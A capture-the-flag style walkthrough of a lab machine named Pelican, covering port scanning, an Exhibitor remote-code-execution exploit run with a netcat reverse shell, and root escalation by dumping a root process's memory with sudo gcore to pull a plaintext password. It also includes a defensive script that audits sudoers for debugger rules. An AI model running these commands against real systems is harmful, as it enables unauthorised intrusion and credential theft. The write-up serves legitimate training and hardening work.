# Pelican

## sudo gcore to dump root process memory

### Summary

Identified a Zookeeper Exhibitor dashboard on port `8080`, known to be vulnerable to remote command execution. Used a public exploit to gain shell access as `charles`. Privilege escalation achieved via `sudo gcore`: dumped the memory of a root process and recovered the root password.
## 🧵 Let's Unpack

### 🔎 Enumeration

Nmap full TCP scan:

```
nmap -p- -T5 192.168.167.98 -vv
# Extracted ports:
22,139,445,631,2181,2222,8080,8081,44505
```

Nmap service enumeration:

```
sudo nmap -A -sC -sN -oN nmapFull -p 22,139,445,631,2181,2222,8080,8081,44505 192.168.167.98
```

- Two SSH ports: `22` and `2222` (both OpenSSH 7.9p1)
- Samba services on `139` and `445`
- CUPS on `631` with the PUT method allowed
- Zookeeper Exhibitor interface discovered on port `8080`
- Port `8081` redirects to `8080/exhibitor/v1/ui/index.html`
- Port `44505` was open|filtered (tcpwrapped)
### 🚪 Initial Foothold

Exploit used: Exhibitor-RCE

```
./exploit.sh 192.168.167.98 8080 192.168.45.175 4444
nc -nlvp 4444
# Received reverse shell as user: charles
```

Upgraded to a PTY shell:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```
### 🔐 Privilege Escalation

Checked sudo permissions:

```
sudo -l
```

```
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore
```

User `charles` can run `/usr/bin/gcore` as root without a password, so `sudo gcore <pid>` can dump the memory of any process, including one that holds a password.
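The `sudo -l` output above is exactly the kind of rule a sudoers review should catch before an attacker does. The following POSIX shell script is an added example for that review, not part of the original write-up: it reads `sudo -l` style text, keeps only the rule lines, and flags every `NOPASSWD` command whose binary can read other processes' memory as root. The binary list (`DANGEROUS_BINS`) and both sample outputs are constructed for illustration; the first sample reproduces the Pelican rule plus one benign rule that must not be flagged.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit "sudo -l" output for
# NOPASSWD rules that hand a user a memory-dumping or debugging tool as root.
# The binary list and both sample outputs below are constructed for illustration.

# Binaries that, run as root, can read another process's memory via ptrace.
DANGEROUS_BINS="gcore gdb strace ltrace"

# Constructed sample 1: the rule set from this write-up plus one benign rule.
SAMPLE_PELICAN='Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore
    (root) /usr/bin/systemctl restart cups'

# Constructed sample 2: one rule listing several commands, two of them risky.
SAMPLE_MULTI='User bob may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/gdb, /usr/bin/strace, /usr/bin/apt update'

# audit_sudo_rules: read "sudo -l" output on stdin and print one
# "FLAG NOPASSWD <binary>" line for every risky passwordless command.
audit_sudo_rules() {
    # Rule lines start with a parenthesised run-as spec such as "(ALL)".
    grep -E '^[[:space:]]*\(' | while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        # Text after "NOPASSWD:" is a comma-separated command list.
        cmds=${line#*NOPASSWD:}
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            # First word is the command path; drop arguments and directory.
            bin=$(printf '%s\n' "$cmd" | awk '{print $1}')
            bin=${bin##*/}
            for d in $DANGEROUS_BINS; do
                if [ "$bin" = "$d" ]; then
                    printf 'FLAG NOPASSWD %s\n' "$bin"
                fi
            done
        done
    done
}

# flagged_count: print how many risky NOPASSWD commands a block of
# "sudo -l" text contains (0 when nothing is flagged).
flagged_count() {
    printf '%s\n' "$1" | audit_sudo_rules | grep -c .
}

# Stand-alone run: audit both constructed samples.
printf '%s\n' "$SAMPLE_PELICAN" | audit_sudo_rules
printf '%s\n' "$SAMPLE_MULTI" | audit_sudo_rules
```

Run against the Pelican rule set the script prints a single `FLAG NOPASSWD gcore` line and leaves the `systemctl` rule alone. The fix is to drop the rule rather than to restrict its arguments: any way of attaching a debugger to a root process leaks that process's memory. On Linux, `kernel.yama.ptrace_scope=3` refuses `PTRACE_ATTACH` for every process, root included, but it is a host-wide setting that also breaks legitimate debugging, so treat it as a last resort rather than a substitute for a clean sudoers file.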
Identified an interesting root-owned process:

```
ps auxwww | grep password
root 496 0.0 0.0 2276 72 ? Ss 05:09 0:00 /usr/bin/password-store
```

Used `gcore` to dump the memory of the root process:

```
sudo gcore 496
# Dump saved as core.496
strings core.496 | less
# Found credentials:
001 Password: root:
ClogKingpinInning731
```

Switched to root:

```
su root
# 🎉 Boom! Root shell!
```
### ☠️ Gotcha!

Zookeeper Exhibitor UIs exposed without auth and `gcore` sudo misconfigs are a root access recipe waiting to be abused.